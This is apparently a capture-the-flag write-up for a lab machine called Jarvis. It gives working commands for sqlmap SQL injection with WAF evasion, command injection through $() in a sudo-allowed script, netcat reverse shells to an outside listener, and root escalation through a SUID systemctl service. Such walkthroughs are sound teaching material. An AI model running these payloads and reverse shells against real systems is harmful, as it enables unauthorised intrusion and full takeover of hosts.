The entrypoint for Jarvis is an SQL injection vulnerability in the web application to book hotel rooms. There is a WAF but I was able to easily get around it by lowering the amount of requests per second in sqlmap and changing the user-agent header. After landing a shell, I exploit a simple command injection to get access to another user then I use systemctl which has been set SUID root to create a new service and get root RCE.
- There’s a SQL injection vulnerability in the
room.phpcode that can be used to dump the database and get RCE
- We can escalate from
pepperuser by command injection in the
- For privesc, the
systemctlhas been made SUID so we can just register a new service that spawns a reverse shell as root
# nmap -sC -sV -p- 10.10.10.143 Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-23 13:21 EDT Nmap scan report for jarvis.htb (10.10.10.143) Host is up (0.024s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA) | 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA) |_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Stark Hotel 64999/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web enumeration on port 64999
The page on port 64999 displays a banned error message. This page is used whenever the protection mecanism is triggered on the box. Traffic to port 80 is redirected to port 64999 using iptables whenever an SQL injection is detected.
Web enumeration on port 80
On port 80 we have the webpage of Stark Hotel.
There’s a link that display the various rooms.
I spidered the website with Burp and found a couple of PHP files.
To book a room, the
room.php file takes the
cod parameter. The room ID is probably stored in a database so this is target for a potential SQL injection.
I used sqlmap to scan for SQL injection points:
sqlmap -u http://jarvis.htb/room.php?cod=1 -p cod
I started getting 404 errors and got the
Hey you have been banned for 90 seconds, don't be bad message when I tried browsing the site. There’s some kind of WAF on the site that triggers when it’s being scanned for SQL injections.
There’s an HTTP header in the response that confirms this:
To bypass the WAF, I changed the User-Agent header to a random header and added a delay when scanning with SQLmap:
sqlmap -u http://jarvis.htb/room.php?cod=1 -p cod --delay 2 --random-agent
sqlmap found 3 type of SQL injections
- boolean-based blind
- time-based blind
- UNION query
By default, sqlmap will use the union query since it’s much faster than the other two.
We easily get a shell using the
--os-pwn option in sqlmap:
sqlmap -u http://jarvis.htb/room.php?cod=1 -p cod --delay 2 --random-agent --os-pwn
Escalating to user pepper
/var/www/Admin-Utilities contains a
simpler.py script that can be executed as user
pepper through sudo:
www-data@jarvis:~/Admin-Utilities$ sudo -l Matching Defaults entries for www-data on jarvis: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on jarvis: (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
The ping function contains a command injection vulnerability. Because it uses the
os.system function to execute the ping, we can pass additional parameters to execute commands.
def exec_ping(): forbidden = ['&', ';', '-', '`', '||', '|'] command = input('Enter an IP: ') for i in forbidden: if i in command: print('Got you') exit() os.system('ping ' + command)
There’s a list of forbidden commands so we can’t simply use the semi-colon or ampersand characters to inject commands but the
$() characters are not filtered.
I’ve created a small script that’s execute a netcat reverse shell into
#!/bin/sh nc -e /bin/bash 10.10.14.5 5555
I can execute the script by injecting the following payload in
www-data@jarvis:~$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p sudo -u pepper /var/www/Admin-Utilities/simpler.py -p *********************************************** _ _ ___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _ / __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | | \__ \ | | | | | | |_) | | __/ |_ | |_) | |_| | |___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, | |_| |_| |___/ @ironhackers.es *********************************************** Enter an IP: $(/dev/shm/shell.sh) $(/dev/shm/shell.sh)
I now have a shell as
# nc -lvnp 5555 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::5555 Ncat: Listening on 0.0.0.0:5555 Ncat: Connection from 10.10.10.143. Ncat: Connection from 10.10.10.143:38924. id uid=1000(pepper) gid=1000(pepper) groups=1000(pepper) python -c 'import pty;pty.spawn("/bin/bash")' pepper@jarvis:/var/www$ cd cd pepper@jarvis:~$ ls ls Web user.txt pepper@jarvis:~$ cat user.txt 2afa36c...
Looking at SUID binaries, the
systemctl program stands out since it’s not normally SUID:
pepper@jarvis:~$ find / -perm /4000 2>/dev/null [...] /bin/systemctl [...]
The group has been changed to
pepper so this is likely our next target:
pepper@jarvis:~$ ls -l /bin/systemctl -rwsr-x--- 1 root pepper 174520 Feb 17 03:22 /bin/systemctl
Because we can run
systemctl as root, we can register new services that get executed as whatever user we want. Getting root access is simple since all we need to do is register a new service that’s spawn another reverse shell. I’ll just create
[Unit] Description=Pwn service [Service] ExecStart=/bin/nc -e /bin/bash 10.10.14.5 7777 [Install] WantedBy=multi-user.target
Then register the new service and start it:
pepper@jarvis:/dev/shm$ systemctl enable /dev/shm/pwn.service Created symlink /etc/systemd/system/multi-user.target.wants/pwn.service -> /dev/shm/pwn.service. Created symlink /etc/systemd/system/pwn.service -> /dev/shm/pwn.service. pepper@jarvis:/dev/shm$ systemctl start pwn
We then get a reverse shell as root:
# nc -lvnp 7777 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::7777 Ncat: Listening on 0.0.0.0:7777 Ncat: Connection from 10.10.10.143. Ncat: Connection from 10.10.10.143:48144. id uid=0(root) gid=0(root) groups=0(root) cat /root/root.txt d41d8cd...